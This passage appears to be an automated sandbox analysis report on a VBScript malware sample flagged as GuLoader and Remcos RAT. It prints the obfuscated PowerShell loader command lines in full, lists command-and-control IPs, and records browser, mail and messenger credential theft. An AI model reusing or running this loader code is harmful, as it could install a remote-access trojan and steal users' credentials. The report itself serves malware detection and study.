Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wwudnmvruyjoifwgeowdizhtynh" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yyzoofgtigbtltskvyiftmucztzsei" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'viljestrk taxies datch unexplosively unclipper opsadlede knox byguerillaernes dragen fyrstehoffernes psocids thetarytme dommerklub antidoted bacteroides47 foerstedel rendzina definitionsmngderne244 forngterens tillgsbetalings siris reproducerer skovfogedblerne credo viljestrk taxies datch unexplosively unclipper opsadlede knox byguerillaernes dragen fyrstehoffernes psocids thetarytme dommerklub antidoted bacteroides47 foerstedel rendzina definitionsmngderne244 forngterens tillgsbetalings siris reproducerer skovfogedblerne credo';if (${host}.currentculture) {$banderillero++;}function mashlin($corban){$goosing=$corban.length-$banderillero;$solubilities180='substri';$solubilities180+='ng';for( $aflvningsmiddels=7;$aflvningsmiddels -lt $goosing;$aflvningsmiddels+=8){$viljestrk+=$corban.$solubilities180.invoke( $aflvningsmiddels, $banderillero);}$viljestrk;}function catholicate($lyncine){ . ($svinske25) ($lyncine);}$sikhens=mashlin ' rugenbmitalienokdery,ezbefugteiph,tololfhovedel.udgerealserund/koasuta5 bribeg.clearhe0underud lolansp(kamgavlwmawingrioverfo.n overp dgnarredoopportuw.ahabeas preemp ant nagnef.erspt preter blinde1utaalmo0parkeri.fontina0e rthin; onabso .ortidswf iktioig,uppeannonconc6aracari4 abbots;r aensb trinervx moni,o6observ.4 brepil;sognefo cyc,otrh.lautov lssene:polyes.1prkener2 allahc1jongl,r. reinco0 deduct)gleaned t easurgkautionepoli urc tpdherk sukkerocarpopo/fa litt2gordyfy0desilve1 langpl0coconsc0senatus1parapla0mercify1 tartb underb,foverhrti religirmodulate statssf chieftobortforxlogfile/ unclin1flyttel2nepotis1bverr t.dis ppo0sammens ';$sensationer=mashlin 'solingkucell.resskybrude,nshakerscandal- centimap,eoccugparad.ne limphaneffluent pla.tp ';$unclipper=mashlin ' skrifthsk.lepat vangsftoverextp snren :digebru/ brugsv/stenion1sandema0 k mmar3drikkes.talioni2sacr me3general7postco,.v,relag8e,cyoff6elfenbe.adfrds.2mijn,ee4colorif7semiana/skrigeddtaksatiasprogbrg succ.dustilleveiverensragrafedr.ehndige tusindodeaminatj,nerelybequotep atriumi frownsepushilyrm usehansarinoseaabentvsnoug,te.cockpitfm,slinglw.istwaakuratel ';$gesjftigstes=mashlin '.acemak>coglori ';$svinske25=mashlin ' u,ilisisundhedemedmennxpr,stit ';$bmw='byguerillaernes';$anskaffedes = mashlin 'isblokke opht.acmadnesshpryglero dep le prevari%h ircapasuggestpcivilbepfrbaadedguldfataindm,dstovergloafarve.r%fuldebd\bunddkkrgemmedmepreinven shi kiointensiwfo,staaneuroomre.nstrukra.ylate.manged s rds,lsubuf,erenudlgger sterr.t&barna,t&usselve whissleewrassesc,loweryhinkstonoli,uori lys,pritsko are ';catholicate (mashlin 'obs.etr$gasbagggunpleaslmediat.o viniesboutplacaud ullelpharmac:.aferwohrefu,biamek.niss.lveaartme struiskorstegsvengalhgatedhaenonfecudkrigsspesydste.rvariabe=kontoku(hallucic su fitmblackbudskresta undece/verdenscfarmin, hordeol$e,rwigsasnep,ovn disnums elikatkf,ortenabahamanfejerbolf nyligeechastendsot
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'viljestrk taxies datch unexplosively unclipper opsadlede knox byguerillaernes dragen fyrstehoffernes psocids thetarytme dommerklub antidoted bacteroides47 foerstedel rendzina definitionsmngderne244 forngterens tillgsbetalings siris reproducerer skovfogedblerne credo viljestrk taxies datch unexplosively unclipper opsadlede knox byguerillaernes dragen fyrstehoffernes psocids thetarytme dommerklub antidoted bacteroides47 foerstedel rendzina definitionsmngderne244 forngterens tillgsbetalings siris reproducerer skovfogedblerne credo';if (${host}.currentculture) {$banderillero++;}function mashlin($corban){$goosing=$corban.length-$banderillero;$solubilities180='substri';$solubilities180+='ng';for( $aflvningsmiddels=7;$aflvningsmiddels -lt $goosing;$aflvningsmiddels+=8){$viljestrk+=$corban.$solubilities180.invoke( $aflvningsmiddels, $banderillero);}$viljestrk;}function catholicate($lyncine){ . ($svinske25) ($lyncine);}$sikhens=mashlin ' rugenbmitalienokdery,ezbefugteiph,tololfhovedel.udgerealserund/koasuta5 bribeg.clearhe0underud lolansp(kamgavlwmawingrioverfo.n overp dgnarredoopportuw.ahabeas preemp ant nagnef.erspt preter blinde1utaalmo0parkeri.fontina0e rthin; onabso .ortidswf iktioig,uppeannonconc6aracari4 abbots;r aensb trinervx moni,o6observ.4 brepil;sognefo cyc,otrh.lautov lssene:polyes.1prkener2 allahc1jongl,r. reinco0 deduct)gleaned t easurgkautionepoli urc tpdherk sukkerocarpopo/fa litt2gordyfy0desilve1 langpl0coconsc0senatus1parapla0mercify1 tartb underb,foverhrti religirmodulate statssf chieftobortforxlogfile/ unclin1flyttel2nepotis1bverr t.dis ppo0sammens ';$sensationer=mashlin 'solingkucell.resskybrude,nshakerscandal- centimap,eoccugparad.ne limphaneffluent pla.tp ';$unclipper=mashlin ' skrifthsk.lepat vangsftoverextp snren :digebru/ brugsv/stenion1sandema0 k mmar3drikkes.talioni2sacr me3general7postco,.v,relag8e,cyoff6elfenbe.adfrds.2mijn,ee4colorif7semiana/skrigeddtaksatiasprogbrg succ.dustilleveiverensragrafedr.ehndige tusindodeaminatj,nerelybequotep atriumi frownsepushilyrm usehansarinoseaabentvsnoug,te.cockpitfm,slinglw.istwaakuratel ';$gesjftigstes=mashlin '.acemak>coglori ';$svinske25=mashlin ' u,ilisisundhedemedmennxpr,stit ';$bmw='byguerillaernes';$anskaffedes = mashlin 'isblokke opht.acmadnesshpryglero dep le prevari%h ircapasuggestpcivilbepfrbaadedguldfataindm,dstovergloafarve.r%fuldebd\bunddkkrgemmedmepreinven shi kiointensiwfo,staaneuroomre.nstrukra.ylate.manged s rds,lsubuf,erenudlgger sterr.t&barna,t&usselve whissleewrassesc,loweryhinkstonoli,uori lys,pritsko are ';catholicate (mashlin 'obs.etr$gasbagggunpleaslmediat.o viniesboutplacaud ullelpharmac:.aferwohrefu,biamek.niss.lveaartme struiskorstegsvengalhgatedhaenonfecudkrigsspesydste.rvariabe=kontoku(hallucic su fitmblackbudskresta undece/verdenscfarmin, hordeol$e,rwigsasnep,ovn disnums elikatkf,ortenabahamanfejerbolf nyligeechastendsot
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'viljestrk taxies datch unexplosively unclipper opsadlede knox byguerillaernes dragen fyrstehoffernes psocids thetarytme dommerklub antidoted bacteroides47 foerstedel rendzina definitionsmngderne244 forngterens tillgsbetalings siris reproducerer skovfogedblerne credo viljestrk taxies datch unexplosively unclipper opsadlede knox byguerillaernes dragen fyrstehoffernes psocids thetarytme dommerklub antidoted bacteroides47 foerstedel rendzina definitionsmngderne244 forngterens tillgsbetalings siris reproducerer skovfogedblerne credo';if (${host}.currentculture) {$banderillero++;}function mashlin($corban){$goosing=$corban.length-$banderillero;$solubilities180='substri';$solubilities180+='ng';for( $aflvningsmiddels=7;$aflvningsmiddels -lt $goosing;$aflvningsmiddels+=8){$viljestrk+=$corban.$solubilities180.invoke( $aflvningsmiddels, $banderillero);}$viljestrk;}function catholicate($lyncine){ . ($svinske25) ($lyncine);}$sikhens=mashlin ' rugenbmitalienokdery,ezbefugteiph,tololfhovedel.udgerealserund/koasuta5 bribeg.clearhe0underud lolansp(kamgavlwmawingrioverfo.n overp dgnarredoopportuw.ahabeas preemp ant nagnef.erspt preter blinde1utaalmo0parkeri.fontina0e rthin; onabso .ortidswf iktioig,uppeannonconc6aracari4 abbots;r aensb trinervx moni,o6observ.4 brepil;sognefo cyc,otrh.lautov lssene:polyes.1prkener2 allahc1jongl,r. reinco0 deduct)gleaned t easurgkautionepoli urc tpdherk sukkerocarpopo/fa litt2gordyfy0desilve1 langpl0coconsc0senatus1parapla0mercify1 tartb underb,foverhrti religirmodulate statssf chieftobortforxlogfile/ unclin1flyttel2nepotis1bverr t.dis ppo0sammens ';$sensationer=mashlin 'solingkucell.resskybrude,nshakerscandal- centimap,eoccugparad.ne limphaneffluent pla.tp ';$unclipper=mashlin ' skrifthsk.lepat vangsftoverextp snren :digebru/ brugsv/stenion1sandema0 k mmar3drikkes.talioni2sacr me3general7postco,.v,relag8e,cyoff6elfenbe.adfrds.2mijn,ee4colorif7semiana/skrigeddtaksatiasprogbrg succ.dustilleveiverensragrafedr.ehndige tusindodeaminatj,nerelybequotep atriumi frownsepushilyrm usehansarinoseaabentvsnoug,te.cockpitfm,slinglw.istwaakuratel ';$gesjftigstes=mashlin '.acemak>coglori ';$svinske25=mashlin ' u,ilisisundhedemedmennxpr,stit ';$bmw='byguerillaernes';$anskaffedes = mashlin 'isblokke opht.acmadnesshpryglero dep le prevari%h ircapasuggestpcivilbepfrbaadedguldfataindm,dstovergloafarve.r%fuldebd\bunddkkrgemmedmepreinven shi kiointensiwfo,staaneuroomre.nstrukra.ylate.manged s rds,lsubuf,erenudlgger sterr.t&barna,t&usselve whissleewrassesc,loweryhinkstonoli,uori lys,pritsko are ';catholicate (mashlin 'obs.etr$gasbagggunpleaslmediat.o viniesboutplacaud ullelpharmac:.aferwohrefu,biamek.niss.lveaartme struiskorstegsvengalhgatedhaenonfecudkrigsspesydste.rvariabe=kontoku(hallucic su fitmblackbudskresta undece/verdenscfarmin, hordeol$e,rwigsasnep,ovn disnums elikatkf,ortenabahamanfejerbolf nyligeechastendsot Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'viljestrk taxies datch unexplosively unclipper opsadlede knox byguerillaernes dragen fyrstehoffernes psocids thetarytme dommerklub antidoted bacteroides47 foerstedel rendzina definitionsmngderne244 forngterens tillgsbetalings siris reproducerer skovfogedblerne credo viljestrk taxies datch unexplosively unclipper opsadlede knox byguerillaernes dragen fyrstehoffernes psocids thetarytme dommerklub antidoted bacteroides47 foerstedel rendzina definitionsmngderne244 forngterens tillgsbetalings siris reproducerer skovfogedblerne credo';if (${host}.currentculture) {$banderillero++;}function mashlin($corban){$goosing=$corban.length-$banderillero;$solubilities180='substri';$solubilities180+='ng';for( $aflvningsmiddels=7;$aflvningsmiddels -lt $goosing;$aflvningsmiddels+=8){$viljestrk+=$corban.$solubilities180.invoke( $aflvningsmiddels, $banderillero);}$viljestrk;}function catholicate($lyncine){ . ($svinske25) ($lyncine);}$sikhens=mashlin ' rugenbmitalienokdery,ezbefugteiph,tololfhovedel.udgerealserund/koasuta5 bribeg.clearhe0underud lolansp(kamgavlwmawingrioverfo.n overp dgnarredoopportuw.ahabeas preemp ant nagnef.erspt preter blinde1utaalmo0parkeri.fontina0e rthin; onabso .ortidswf iktioig,uppeannonconc6aracari4 abbots;r aensb trinervx moni,o6observ.4 brepil;sognefo cyc,otrh.lautov lssene:polyes.1prkener2 allahc1jongl,r. reinco0 deduct)gleaned t easurgkautionepoli urc tpdherk sukkerocarpopo/fa litt2gordyfy0desilve1 langpl0coconsc0senatus1parapla0mercify1 tartb underb,foverhrti religirmodulate statssf chieftobortforxlogfile/ unclin1flyttel2nepotis1bverr t.dis ppo0sammens ';$sensationer=mashlin 'solingkucell.resskybrude,nshakerscandal- centimap,eoccugparad.ne limphaneffluent pla.tp ';$unclipper=mashlin ' skrifthsk.lepat vangsftoverextp snren :digebru/ brugsv/stenion1sandema0 k mmar3drikkes.talioni2sacr me3general7postco,.v,relag8e,cyoff6elfenbe.adfrds.2mijn,ee4colorif7semiana/skrigeddtaksatiasprogbrg succ.dustilleveiverensragrafedr.ehndige tusindodeaminatj,nerelybequotep atriumi frownsepushilyrm usehansarinoseaabentvsnoug,te.cockpitfm,slinglw.istwaakuratel ';$gesjftigstes=mashlin '.acemak>coglori ';$svinske25=mashlin ' u,ilisisundhedemedmennxpr,stit ';$bmw='byguerillaernes';$anskaffedes = mashlin 'isblokke opht.acmadnesshpryglero dep le prevari%h ircapasuggestpcivilbepfrbaadedguldfataindm,dstovergloafarve.r%fuldebd\bunddkkrgemmedmepreinven shi kiointensiwfo,staaneuroomre.nstrukra.ylate.manged s rds,lsubuf,erenudlgger sterr.t&barna,t&usselve whissleewrassesc,loweryhinkstonoli,uori lys,pritsko are ';catholicate (mashlin 'obs.etr$gasbagggunpleaslmediat.o viniesboutplacaud ullelpharmac:.aferwohrefu,biamek.niss.lveaartme struiskorstegsvengalhgatedhaenonfecudkrigsspesydste.rvariabe=kontoku(hallucic su fitmblackbudskresta undece/verdenscfarmin, hordeol$e,rwigsasnep,ovn disnums elikatkf,ortenabahamanfejerbolf nyligeechastendsot Jump to behavior
Source: wab.exe, 0000000A.00000003.1852061971.0000000000908000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.1826213713.000000000090B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.1852251291.000000000090A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerH
Source: wab.exe, 0000000A.00000003.1852061971.0000000000908000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2647623152.000000000090B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.1826213713.000000000090B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: wab.exe, 0000000A.00000002.2647623152.000000000090B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQ
Source: wab.exe, 0000000A.00000002.2647623152.000000000090B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerq
Source: wab.exe, 0000000A.00000002.2645737177.00000000008DF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerUU#`3
Source: wab.exe, 0000000A.00000002.2645737177.00000000008DF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: wab.exe, 0000000A.00000003.1852061971.0000000000908000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.1852251291.000000000090A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager2I\
Source: wab.exe, 0000000A.00000003.1852061971.0000000000908000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2647623152.000000000090B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.1826213713.000000000090B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager>
Source: wab.exe, 0000000A.00000002.2647623152.000000000090B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager;
Source: wab.exe, 0000000A.00000002.2645737177.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, logs.dat.10.dr Binary or memory string: [Program Manager]
Contains functionality to query CPU information (cpuid)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_20DE2933 cpuid 10_2_20DE2933
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_20DE2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 10_2_20DE2264
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 12_2_004082CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0041739B GetVersionExW, 11_2_0041739B
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Remcos RAT
Source: Yara match File source: 0000000A.00000002.2645737177.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2642932764.00000000003BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2645737177.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 6968, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite Jump to behavior
Tries to steal Instant Messenger accounts or passwords
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail Jump to behavior
Tries to steal Mail credentials (via file registry)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: ESMTPPassword 12_2_004033F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 12_2_00402DB3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 12_2_00402DB3
Yara detected WebBrowserPassView password recovery tool
Source: Yara match File source: Process Memory Space: wab.exe PID: 6968, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wab.exe PID: 7712, type: MEMORYSTR

Remote Access Functionality
barindex
Detected Remcos RAT
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-KECL2I Jump to behavior
Yara detected Remcos RAT
Source: Yara match File source: 0000000A.00000002.2645737177.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2642932764.00000000003BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2645737177.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 6968, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465864 Sample: Payment Confirmation.vbs Startdate: 02/07/2024 Architecture: WINDOWS Score: 100 40 geoplugin.net 2->40 42 198.187.3.20.in-addr.arpa 2->42 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Yara detected GuLoader 2->58 60 11 other signatures 2->60 10 wscript.exe 1 2->10         started        signatures3 process4 signatures5 62 VBScript performs obfuscated calls to suspicious functions 10->62 64 Suspicious powershell command line found 10->64 66 Wscript starts Powershell (via cmd or directly) 10->66 68 3 other signatures 10->68 13 powershell.exe 14 19 10->13         started        process6 dnsIp7 48 103.237.86.247, 49706, 60018, 80 BGNR-AP2BainandCompanySG unknown 13->48 76 Suspicious powershell command line found 13->76 78 Obfuscated command line found 13->78 80 Very long command line found 13->80 82 Found suspicious powershell code related to unpacking or dynamic code loading 13->82 17 powershell.exe 17 13->17         started        20 conhost.exe 13->20         started        22 cmd.exe 1 13->22         started        signatures8 process9 signatures10 50 Writes to foreign memory regions 17->50 52 Found suspicious powershell code related to unpacking or dynamic code loading 17->52 24 wab.exe 3 15 17->24         started        29 cmd.exe 1 17->29         started        process11 dnsIp12 44 103.237.87.161, 1993, 60022, 60023 BGNR-AP2BainandCompanySG unknown 24->44 46 geoplugin.net 178.237.33.50, 60024, 80 ATOM86-ASATOM86NL Netherlands 24->46 38 C:\ProgramData\remcos\logs.dat, data 24->38 dropped 70 Detected Remcos RAT 24->70 72 Maps a DLL or memory area into 